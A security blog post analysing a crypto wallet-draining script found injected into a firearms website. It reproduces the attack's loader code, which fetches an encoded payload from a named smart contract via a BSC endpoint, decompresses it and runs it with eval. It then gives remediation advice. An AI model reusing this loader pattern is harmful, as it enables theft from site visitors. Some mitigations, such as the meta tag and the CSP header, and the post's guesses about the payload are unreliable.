5 min to read
Crypto Wallet Draining Attack Found on a Popular Gun Website
Malicious JavaScript Hidden in a Smart Contract
A recent investigation into a popular firearms and accessories website revealed a major security compromise—a crypto wallet-draining attack embedded in the site’s JavaScript. This attack specifically targets visitors with MetaMask, Trust Wallet, or any Web3-enabled cryptocurrency wallets.
What Happened?
While browsing a well-known site for firearm upgrades and gear, a malicious JavaScript payload was found embedded in the page source. This script is designed to steal cryptocurrency from unsuspecting visitors who have Web3 wallets connected to their browsers.
This attack does not require the user to interact with the page actively—just loading the page with a connected wallet is enough to put them at risk.
🔍 How the Attack Works
1️⃣ The Malicious Script Loads Hidden JavaScript Files
The attack begins when a visitor loads the website. Embedded scripts dynamically load external JavaScript files that are obfuscated and hidden within the site’s cache directory:
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/npm/web3@latest/dist/web3.min.js" defer></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/ajax/libs/pako/2.0.4/pako.min.js" defer></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-src="/wp-content/cache/min/1/npm/[email protected]/crypto-js.min.js" defer></script>
- Web3.js – Enables interaction with cryptocurrency wallets.
- Pako.js – Decompresses encoded JavaScript payloads stored elsewhere.
- Crypto-JS – Helps obfuscate malicious data.
These scripts execute automatically when the page loads, preparing for the next stage of the attack.
2️⃣ Connecting to a Malicious Smart Contract
The script then establishes a connection to Binance Smart Chain (BSC) and retrieves encoded attack code from a deployed smart contract:
const web3 = new Web3("https://bsc-dataseed.binance.org/");
const contract = new web3.eth.Contract(
[
{ "inputs": [], "name": "getPayload", "outputs": [{ "internalType": "string", "name": "", "type": "string" }], "stateMutability": "view", "type": "function" }
],
"0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53" // Attacker's smart contract address
);
🚨 This is where the attack becomes unique—malicious JavaScript is stored directly inside the blockchain. 🚨
Unlike traditional malware hosting methods, blockchain smart contracts are immutable and cannot be removed, making it impossible to take down the payload without shutting down the entire blockchain.
3️⃣ Decoding & Executing Malicious Code
Once the payload is retrieved, it is decoded and executed dynamically in the user’s browser:
const ds = pako.ungzip(
Uint8Array.from(atob(await contract.methods.getPayload().call()), c => c.charCodeAt(0)),
{ to: "string" }
);
eval(`(async()=>{${ds}})();`);
This script executes hidden JavaScript that likely:
✅ Extracts private keys or wallet information
✅ Signs unauthorized transactions
✅ Sends user funds to an attacker-controlled wallet
🚨 Users don’t even have to click anything—just visiting the site with a connected crypto wallet is enough to lose their funds.
⚠️ Why This Attack is So Dangerous
This method of attack is particularly difficult to detect and mitigate because:
- 🔹 The malicious payload is stored on a blockchain, making it impossible to take down.
- 🔹 The JavaScript executes dynamically, bypassing traditional security filters.
- 🔹 Web3 wallets are designed to interact with blockchain contracts, so the attack appears legitimate.
- 🔹 No phishing or downloads are required—just loading the site is enough.
🚨 Who is at Risk?
- Users with Web3-enabled browsers and active wallets (MetaMask, Trust Wallet, etc.).
- People who visit affected websites while logged into their crypto wallets.
- Web3 users who do not manually review transaction prompts before signing.
If you visited this site and had MetaMask or another wallet connected, you should:
✅ Disconnect your wallet immediately.
✅ Transfer funds to a secure hardware wallet.
✅ Check transaction history for unauthorized transfers.
🛠️ How Website Owners Can Prevent This Attack
If you run a WordPress or eCommerce website, you need to take security seriously. Here’s how to protect your site from similar attacks:
🔍 1. Scan for Malware
- Use Wordfence Security or MalCare to scan your website for injected scripts.
- Check
/wp-content/cache/for unknown scripts that load Web3.js or other blockchain libraries.
🛠️ 2. Secure Your Plugins & Themes
- Update all plugins and themes regularly.
- Remove unused or suspicious plugins.
- Avoid using nulled (pirated) plugins, as they often contain backdoors.
🚀 3. Implement a Strong Content Security Policy (CSP)
-
Block unauthorized script execution by adding this header:
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; -
This prevents malicious JavaScript from running dynamically.
🔐 4. Restrict Web3 Access
- If your site does not require blockchain functionality, block Web3.js execution.
-
Disable MetaMask auto-injection with:
<meta name="ethereum:disabled" content="true"> - Warn users before allowing blockchain interactions.
🛡️ 5. Check for Malicious Database Entries
In phpMyAdmin, run this SQL query to check for injected scripts in your WordPress database:
SELECT * FROM wp_options WHERE option_value LIKE '%<script%';
If you find unexpected JavaScript inside WordPress settings, remove it immediately.
📌 Final Thoughts
The discovery of this Web3 wallet-draining attack shows how creative attackers have become. By storing malicious JavaScript inside blockchain smart contracts, they can bypass security measures and steal funds directly from connected wallets.
🔍 Key Takeaways:
✅ Web3-enabled users should disconnect wallets when browsing unfamiliar sites.
✅ Website owners must audit JavaScript files to prevent unauthorized injections.
✅ Security teams must evolve beyond traditional anti-malware approaches to detect blockchain-based threats.
🚨 If you visited an affected site with a connected wallet, assume you are compromised and take immediate action.
Cybersecurity is an ongoing battle—and blockchain technology is both a blessing and a new attack surface for cybercriminals. Stay vigilant. 🔥
Comments